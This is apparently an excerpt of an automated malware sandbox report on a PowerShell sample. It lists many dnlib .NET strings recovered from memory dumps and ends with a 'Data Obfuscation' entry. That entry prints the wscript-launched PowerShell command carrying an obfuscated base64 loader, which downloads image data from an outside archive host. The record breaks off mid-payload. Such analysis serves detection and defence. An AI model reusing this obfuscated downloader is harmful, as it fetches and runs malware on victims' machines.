                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2145085297.000001CEE9BD0000.00000004.08000000.00040000.00000000.sdmp

                      Data Obfuscation

                      Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: .Run("powershell -command $Codigo = 'J? ? ? ? Bp? ? ? ? G0? ? ? ? YQBn? ? ? ?", "0", "false");
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: $Codigo = 'J? ? ? ? Bp? ? ? ? G0? ? ? ? YQBn? ? ? ? GU? ? ? ? VQBy? ? ? ? Gw? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? JwBo? ? ? ? HQ? ? ? ? d? ? ? ? Bw? ? ? ? HM? ? ? ? Og? ? ? ? v? ? ? ? C8? ? ? ? aQBh? ? ? ? DY? ? ? ? M? ? ? ? ? ? ? ? x? ? ? ? DY? ? ? ? M? ? ? ? ? ? ? ? 2? ? ? ? C4? ? ? ? dQBz? ? ? ? C4? ? ? ? YQBy? ? ? ? GM? ? ? ? a? ? ? ? Bp? ? ? ? HY? ? ? ? ZQ? ? ? ? u? ? ? ? G8? ? ? ? cgBn? ? ? ? C8? ? ? ? MQ? ? ? ? w? ? ? ? C8? ? ? ? aQB0? ? ? ? GU? ? ? ? bQBz? ? ? ? C8? ? ? ? Z? ? ? ? Bl? ? ? ? GE? ? ? ? d? ? ? ? Bo? ? ? ? G4? ? ? ? bwB0? ? ? ? GU? ? ? ? Xw? ? ? ? y? ? ? ? D? ? ? ? ? ? ? ? Mg? ? ? ? 0? ? ? ? D? ? ? ? ? ? ? ? Nw? ? ? ? v? ? ? ? GQ? ? ? ? ZQBh? ? ? ? HQ? ? ? ? a? ? ? ? Bu? ? ? ? G8? ? ? ? d? ? ? ? Bl? ? ? ? C4? ? ? ? agBw? ? ? ? Gc? ? ? ? Jw? ? ? ? 7? ? ? ? CQ? ? ? ? dwBl? ? ? ? GI? ? ? ? QwBs? ? ? ? Gk? ? ? ? ZQBu? ? ? ? HQ? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? TgBl? ? ? ? Hc? ? ? ? LQBP? ? ? ? GI? ? ? ? agBl? ? ? ? GM? ? ? ? d? ? ? ? ? ? ? ? g? ? ? ? FM? ? ? ? eQBz? ? ? ? HQ? ? ? ? ZQBt? ? ? ? C4? ? ? ? TgBl? ? ? ? HQ? ? ? ? LgBX? ? ? ? GU? ? ? ? YgBD? ? ? ? Gw? ? ? ? aQBl? ? ? ? G4? ? ? ? d? ? ? ? ? ? ? ? 7? ? ? ? CQ? ? ? ? aQBt? ? ? ? GE? ? ? ? ZwBl? ? ? ? EI? ? ? ? eQB0? ? ? ? GU? ? ? ? cw? ? ? ? g? ? ? ? D0? ? ? ? I? ? ? ? ? ? ? ? k? ? ? ? Hc? ? ? ? ZQBi? ? ? ? EM? ? ? ? b? ? ? ? Bp? ? ? ? GU? ? ? ? bgB0? ? ? ? C4? ? ? ? R? ? ? ? Bv? ? ? ? Hc? ? ? ? bgBs? ? ? ? G8? ? ? ? YQBk? ? ? ? EQ? ? ? ? YQB0? ? ? ? GE? ? ? ? K? ? ? ? ? ? ? ? k? ? ? ? Gk? ? ? ? bQBh? ? ? ? Gc? ? ? ? ZQBV? ? ? ? HI? 